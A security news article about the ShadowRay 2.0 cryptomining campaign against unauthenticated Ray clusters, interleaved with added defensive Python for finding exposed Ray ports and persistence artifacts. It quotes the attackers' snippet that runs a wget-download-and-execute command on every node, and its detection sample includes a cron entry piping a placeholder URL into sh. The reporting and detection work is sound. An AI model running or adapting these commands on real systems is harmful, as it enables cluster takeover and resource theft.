
Cybersecurity researchers have uncovered an active global hacking campaign leveraging a known flaw in Ray, an open-source AI framework widely used for managing distributed computing tasks.
Dubbed ShadowRay 2.0, this attack exploits vulnerability CVE-2023-48022 to silently seize control of powerful AI computing clusters and turn them into cryptocurrency mining operations.
The campaign represents a significant escalation from the initial ShadowRay discovery in March 2024, with attackers employing sophisticated tactics to remain hidden while extracting maximum value from compromised infrastructure.
Oligo Security researchers identified the attack campaign in early November 2025, discovering that threat actors using the name IronErn440 have weaponized Ray’s legitimate orchestration features into tools for self-propagating attacks.
What makes this threat particularly alarming is the sheer scale of exposure. The number of exposed Ray servers worldwide has grown from thousands during the original discovery to more than 230,000 instances today.
Many belong to active startups, research laboratories, and cloud-hosting providers, creating an expansive attack surface.
Oligo Security analysts identified the attack after observing region-aware malware being distributed through GitLab.
The attackers initially leveraged the DevOps platform to deliver customized payloads adapted to each victim’s geographic location.
After GitLab took down the malicious repository on November 5, 2025, the threat actors quickly migrated their operation to GitHub, demonstrating remarkable operational agility.
By November 10, they had established a new repository and continued their campaign with even greater sophistication.
AI Attacking AI Infrastructure
The attack unfolds through multiple coordinated stages, beginning with reconnaissance using interact.sh, an out-of-band platform that lets attackers identify vulnerable servers without traditional noisy scanning.
Attackers send probes targeting Ray’s unprotected Jobs API, triggering callbacks from vulnerable instances. Once targets are identified, they exploit the unauthenticated Ray dashboard to submit malicious jobs that execute arbitrary code with cluster privileges.
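The entry point described above is a Ray dashboard and Jobs API that are reachable from the network without authentication. The following is an added example (not from the article or from the Ray project) of the check a defender would run first: parse `ss -ltnH` output and report any of Ray's default service ports bound to a non-loopback address. The port numbers are Ray's documented defaults and are an assumption here; the `ss` output is constructed sample data.

```python
"""Added example: flag Ray default ports bound to non-loopback interfaces.
Parses constructed `ss -ltnH` output; on a real host run `ss -ltnH` and pass
its lines to exposed_ray_ports()."""
from ipaddress import ip_address

# Ray's documented default ports (assumed here; confirm against your own
# `ray start` flags or cluster configuration).
RAY_PORTS = {
    8265: "dashboard / Jobs API",
    10001: "Ray Client server",
    6379: "GCS",
}

# Constructed sample of `ss -ltnH` output (header suppressed); not a real host.
SAMPLE_SS = """\
LISTEN 0 128    0.0.0.0:8265     0.0.0.0:*
LISTEN 0 128  127.0.0.1:6379     0.0.0.0:*
LISTEN 0 4096       *:10001           *:*
LISTEN 0 128      [::1]:22          [::]:*
""".splitlines()


def parse_listener(line):
    """Return (host, port) from the Local Address:Port column, or None."""
    parts = line.split()
    if len(parts) < 5:
        return None
    host, _, port = parts[3].rpartition(":")
    if not port.isdigit():
        return None
    return host.strip("[]"), int(port)


def is_reachable_from_network(host):
    """True unless the socket is bound to a loopback address."""
    if host in ("*", ""):          # ss prints '*' for the IPv6 wildcard
        return True
    try:
        ip = ip_address(host)
    except ValueError:             # a hostname; assume it maps to a real NIC
        return True
    return ip.is_unspecified or not ip.is_loopback


def exposed_ray_ports(ss_lines, ports=RAY_PORTS):
    """List (port, bound_host, service) for Ray ports reachable off-host."""
    hits = []
    for line in ss_lines:
        parsed = parse_listener(line)
        if parsed is None:
            continue
        host, port = parsed
        if port in ports and is_reachable_from_network(host):
            hits.append((port, host, ports[port]))
    return hits


if __name__ == "__main__":
    for port, host, service in exposed_ray_ports(SAMPLE_SS):
        print(f"port {port} ({service}) is bound to {host}: restrict it to "
              "loopback or place it behind an authenticating proxy")
```

On the sample data the dashboard (8265) and Ray Client (10001) listeners are reported while the GCS port, bound to 127.0.0.1, is not. The bind address of the dashboard is controlled by the `--dashboard-host` option of `ray start`; anything that must be reachable by other hosts belongs behind network policy or an authenticating reverse proxy rather than on a public interface.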
The most notable aspect is the use of AI-generated payloads. The attackers deploy Python code that automatically discovers available cluster resources, calculates 60 percent CPU and GPU allocation to avoid immediate detection, and then injects cryptocurrency miners disguised as legitimate system processes.
The payloads demonstrate sophisticated error handling and self-adaptation, suggesting they were generated or refined using AI tools to accelerate payload development.
A critical code snippet shows the multi-stage infection mechanism. The initial access payload uses Ray’s NodeAffinitySchedulingStrategy to enumerate cluster nodes and deploy infection scripts to each one:
nodes=[n for n in ray.nodes() if n.get('Alive', False)]
cmd='wget -qO- https://gitlab.com/ironern440-group/ironern440-project/-/raw/main/aa_clean.sh && chmod +x aa_clean.sh && ./aa_clean.sh'
[ray.get(ray.remote(lambda:subprocess.run(cmd,shell=True)).options(scheduling_strategy=NodeAffinitySchedulingStrategy...
The attackers establish persistence through multiple mechanisms: cron jobs executing every fifteen minutes, systemd service hijacking, and SSH key injection into root accounts.
They mask malicious processes by renaming them to appear as legitimate kernel workers like [kworker/0:0] and dns-filter services, effectively hiding in plain sight.
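The persistence and masquerading techniques described in the two paragraphs above each leave a host-level artifact that can be checked without any vendor tooling. The following is an added example (not from the article) of that detection logic run over constructed sample data: a process table, a root crontab and an authorized_keys file. The kernel-thread heuristic relies on a Linux fact (real kernel threads are children of kthreadd, pid 2, and have no exe link and an empty cmdline); the staging-directory list and the dropper regex are assumptions chosen for this example, and the repository URL and key blobs are placeholders.

```python
"""Added example: detect kernel-worker masquerading, staging-dir binaries,
download-and-execute cron entries and unknown root SSH keys. All sample data
is constructed; on a live host read /proc, the crontabs and authorized_keys."""
import base64
import hashlib
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str            # /proc/<pid>/comm
    exe: Optional[str]   # readlink /proc/<pid>/exe; None for a true kernel thread
    cmdline: str         # /proc/<pid>/cmdline with NULs replaced by spaces


# Constructed process table: one genuine kworker, one miner wearing a kworker
# name, one "dns-filter" binary living in /var/tmp, and a normal sshd.
SAMPLE_PROCS = [
    Proc(12, 2, "kworker/0:1", None, ""),
    Proc(4821, 1, "[kworker/0:0]", "/tmp/.x/miner", "[kworker/0:0]"),
    Proc(4830, 1, "dns-filter", "/var/tmp/.dns/dns-filter", "dns-filter --daemon"),
    Proc(901, 1, "sshd", "/usr/sbin/sshd", "/usr/sbin/sshd -D"),
]

# Constructed root crontab; the URL is a placeholder, not a real repository.
SAMPLE_CRONTAB = """
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/15 * * * * wget -qO- https://REPO_PLACEHOLDER/aa_clean.sh | sh
""".strip().splitlines()

# Constructed authorized_keys; the blobs are arbitrary bytes, not real keys.
_b64 = lambda b: base64.b64encode(b).decode()
KNOWN_KEY = "ssh-ed25519 " + _b64(b"constructed-admin-key-bytes") + " admin@host"
ROGUE_KEY = "no-pty ssh-rsa " + _b64(b"constructed-unknown-key-bytes") + " root@x"
SAMPLE_AUTHORIZED_KEYS = [KNOWN_KEY, ROGUE_KEY]
ALLOWED_KEY_BLOBS = {KNOWN_KEY.split()[1]}   # inventory of keys expected on the host

KERNEL_THREAD = re.compile(r"^(kworker|ksoftirqd|kthreadd|migration|rcu_)")
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DROPPER = re.compile(r"\b(wget|curl)\b.*\|\s*(sh|bash)\b|chmod\s+\+x\s+\S+\s*&&\s*\./")
KEY_TYPES = ("ssh-", "ecdsa-", "sk-")


def find_masquerading(procs):
    """A real kernel thread is a child of kthreadd (pid 2) with no exe link and
    an empty cmdline; a kernel-worker name that fails those checks, or any
    process executing from a world-writable staging directory, is flagged."""
    hits = []
    for p in procs:
        looks_kernel = bool(KERNEL_THREAD.match(p.comm.strip("[]")))
        is_kernel = p.ppid == 2 and p.exe is None and p.cmdline == ""
        if looks_kernel and not is_kernel:
            hits.append((p.pid, "kernel-thread name on a user-space process"))
        elif p.exe and p.exe.startswith(STAGING_DIRS):
            hits.append((p.pid, "binary executing from a staging directory"))
    return hits


def find_cron_droppers(lines):
    """Flag cron entries that fetch and execute remote content, keeping the
    schedule so a fifteen-minute beacon is visible in the report."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) == 6 and DROPPER.search(parts[5]):
            hits.append((" ".join(parts[:5]), parts[5]))
    return hits


def ssh_fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 public-key blob."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def find_unknown_keys(lines, allowed_blobs):
    """Fingerprints of authorized_keys entries missing from the allow-list;
    tolerates leading options such as no-pty or command="..."."""
    hits = []
    for line in lines:
        parts = line.split()
        for i, tok in enumerate(parts[:-1]):
            if tok.startswith(KEY_TYPES):
                if parts[i + 1] not in allowed_blobs:
                    hits.append(ssh_fingerprint(parts[i + 1]))
                break
    return hits


def scan(procs=SAMPLE_PROCS, crontab=SAMPLE_CRONTAB,
         keys=SAMPLE_AUTHORIZED_KEYS, allowed=ALLOWED_KEY_BLOBS):
    """Run all three checks and return the findings keyed by artifact type."""
    return {
        "masquerading": find_masquerading(procs),
        "cron_droppers": find_cron_droppers(crontab),
        "unknown_ssh_keys": find_unknown_keys(keys, allowed),
    }
```

On the sample data `scan()` reports the fake kworker and the /var/tmp binary, the fifteen-minute wget-to-shell cron entry, and the fingerprint of the unlisted root key. The fingerprint, rather than the raw blob, is what you would carry into a ticket or a detection rule; the allow-list is the part that needs maintaining, since the check is only as good as the inventory of keys that are supposed to be present.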
What sets this campaign apart is the active competition dynamics. Attackers deploy scripts to detect and terminate rival cryptocurrency miners, then block competing mining pools through iptables rules and host file modifications.
They even target pools on specific ports used by competing threat actors, revealing an underground ecosystem where multiple criminal groups fight for the same compromised resources.
The infrastructure adaptation is equally concerning. For victims in China, attackers deliver region-specific payloads through proxy services to bypass network restrictions.
They employ geographic detection via ip-api.com, executing different scripts for Chinese versus international targets.
The attackers continuously update their payloads through GitLab commits, treating infrastructure as code and enabling real-time evolution of their techniques without redeploying to victim machines.
